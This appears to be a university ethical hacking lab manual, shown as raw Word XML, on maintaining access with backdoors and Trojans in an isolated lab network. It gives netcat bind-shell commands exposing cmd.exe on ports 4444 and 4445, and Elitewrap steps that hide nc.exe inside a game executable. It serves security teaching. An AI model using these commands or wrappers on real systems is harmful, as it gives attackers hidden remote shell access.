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8.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-115.0" w:type="dxa"/>
        <w:tblBorders>
          <w:bottom w:color="000000" w:space="0" w:sz="4" w:val="single"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2276"/>
        <w:gridCol w:w="7282"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2276"/>
            <w:gridCol w:w="72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</w:rPr>
              <w:drawing>
                <wp:inline distB="0" distT="0" distL="114300" distR="114300">
                  <wp:extent cx="1308100" cy="6604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 La Salle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College of Computer Studies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Ethical Hacking Laboratory Manual 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6 – Maintaining Access – Trojans and Backdoors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-115.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1305"/>
        <w:gridCol w:w="305"/>
        <w:gridCol w:w="644"/>
        <w:gridCol w:w="5002"/>
        <w:gridCol w:w="939"/>
        <w:gridCol w:w="283"/>
        <w:gridCol w:w="1080"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1305"/>
            <w:gridCol w:w="305"/>
            <w:gridCol w:w="644"/>
            <w:gridCol w:w="5002"/>
            <w:gridCol w:w="939"/>
            <w:gridCol w:w="283"/>
            <w:gridCol w:w="1080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Daniel Gavrie Clemente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Familiarize the students with the concept of backdoors and Trojans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be able to use tools that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able to create backdoors or Trojans.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Initial Setup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Set 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three machines (whether physical or virtual) with the following </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr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:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3"/>
        <w:tblW w:w="8838.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="6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Address/Subnet Mask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Hacker – Linux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Kali Linux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172.16.15.x/24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Victim – Windows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Windows 7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172.16.15.3x/24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Disable the personal firewalls of the machines.  When working with physical machines, make sure that the network is isolated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when working with virtual machines, ensure that the network setting of the virtual machines are host only or isolated from the physical network.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you are using virtual machines, ensure that you are running “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">host-only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for the network adapters on all virtual machines.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Netcat without the –d switch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command prompt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victim machine.  Go to the netcat folder.  Type the command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 –l –p4444 –e cmd.exe -L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command prompt in the Kali Linux hacker machine. Open a Terminal application and type in the command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 –v &lt;victim ip address&gt; 4444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330.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="605.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4160"/>
        <w:gridCol w:w="1170"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="416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Are you able to connect to the victim machine?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Note : You can issue an ipconfig/all command to verify if you are already connected to the victim machine.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another command prompt in the victim machine. Issue a netstat command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78.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="605.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7308"/>
        <w:gridCol w:w="1170"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="7308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Are you able to see an entry stating that the hacker machine is connected to the victim machine through port 4444?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command prompts in the victim machine and the netcat program in the Kali Linux hacker machine.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another command prompt in the hacker machine. Type the command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 –v &lt;victim ip address&gt; 4444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330.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="605.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4160"/>
        <w:gridCol w:w="1170"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="416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Are you able to connect to the victim machine?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command prompt in the hacker machine.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Netcat with –d switch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command prompt in the victim machine.  Go to the netcat folder.  Type the command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 –l –p4444 -d –e cmd.exe –L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command prompt in the Backtrack hacker machine. Open a Terminal application and type in the command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 –v &lt;victim ip address&gt; 4444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330.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="605.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4160"/>
        <w:gridCol w:w="1170"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="416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Are you able to connect to the victim machine?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command prompt in the victim machine and netcat program in the Kali hacker machine.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another command prompt in the hacker machine. Type the command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 –v &lt;victim ip address&gt; 4444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330.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="605.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4160"/>
        <w:gridCol w:w="1170"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="416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Are you able to connect to the victim machine?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command prompt in the hacker machine.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the purpose of the –d switch.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48.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="6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48"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="8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of –d switch in netcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="1583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-d switch in Netcat runs it in the background (detached mode), allowing it to operate without tying up the terminal.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Wrapper Tool – Elitewrap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victim machine, create a directory called game.  Copy the following to the game folder :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="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elitewrap.exe (from the elitewrap folder)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="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pacman.exe (from the pacman folder)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="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nc.exe (from the netcat folder)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="36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command prompt in the  victim machine and go to the game folder.  Run the elitewrap tool by entering “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elitewrap.exe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the output file as game.exe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the pacman.exe in the package. Set to pack and execute, visible, no command line arguments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the nc.exe in the package. Set to pack and execute, invisible with the command line argument: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-l –p4445 –d –e cmd.exe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the program by entering a blank when prompted for the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package file.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victim machine, double click the game.exe program.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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Terminal application in the hacker machine and type in the command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 –v &lt;victim ip address&gt; 4445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330.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="605.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4160"/>
        <w:gridCol w:w="1170"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="416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Are you able to connect to the victim machine?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60" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note : You can issue the netstat command to verify if you are already connected to the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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Guide Questions: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backdoors and Trojans?  What is the difference between the two?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Backdoors are hidden methods of bypassing normal authentication to gain access to a system, while Trojans are malicious programs disguised as legitimate software that often install backdoors.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can netcat be used to create a backdoor?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Netcat can create a backdoor by setting up a persistent listener on a target system that provides shell access when a connection is made.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purpose of the –d switch of netcat?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The –d switch in Netcat runs it in the background (detached) after execution.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do you set up netcat as a listener? As a client?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To set up </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat as a listener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 -l -p &lt;port&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and as a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 &lt;host&gt; &lt;port&gt;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a wrapper tool?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wrapper tool</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a utility that embeds or runs one program within another to hide, control, or modify its behavior.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Kali Linux - Hacker Machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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https://www.kali.org/get-kali/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Metasploitable 2 - Victim Machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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https://sourceforge.net/projects/metasploitable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Windows 7 Victim Machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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https://drive.google.com/drive/folders/16lKVVJxEVBbIIu1AspjglaZ1bLh7yZMe?usp=sharing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Elite Wrap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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https://drive.google.com/file/d/1TE-fbcjWETnynAjpTmq2wQhTTFAGu2wB/view?usp=share_link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Pacman</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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https://drive.google.com/file/d/1ch_cP3F2Zn3MWc2inwM7zWSSQcI9Nb70/view?usp=share_link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Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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https://sectools.org/tool/netcat</w:t>
        </w:r>
      </w:hyperlink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ourier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1"/>
      <w:tblW w:w="9576.0" w:type="dxa"/>
      <w:jc w:val="left"/>
      <w:tblInd w:w="-115.0" w:type="dxa"/>
      <w:tblLayout w:type="fixed"/>
      <w:tblLook w:val="0000"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="7758"/>
      <w:gridCol w:w="1818"/>
      <w:tblGridChange w:id="0">
        <w:tblGrid>
          <w:gridCol w:w="7758"/>
          <w:gridCol w:w="181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rPr/>
          </w:pPr>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">Ethical Hacking Laboratory Manual – Maintaining Access – Backdoor and Trojans</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr/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0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decimal"/>
      <w:lvlText w:val="%1.%2.%3.●.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="1080"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.●.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="1080"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.●.%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="1440"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.●.%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="1440"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.●.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="468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  <w:ind w:left="432" w:hanging="43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left="576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widowControl w:val="0"/>
      <w:ind w:left="1152" w:hanging="1152"/>
      <w:jc w:val="center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ch_cP3F2Zn3MWc2inwM7zWSSQcI9Nb70/view?usp=share_link" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1TE-fbcjWETnynAjpTmq2wQhTTFAGu2wB/view?usp=share_link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sectools.org/tool/netca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6lKVVJxEVBbIIu1AspjglaZ1bLh7yZMe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kali.org/get-kali/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/metasploitab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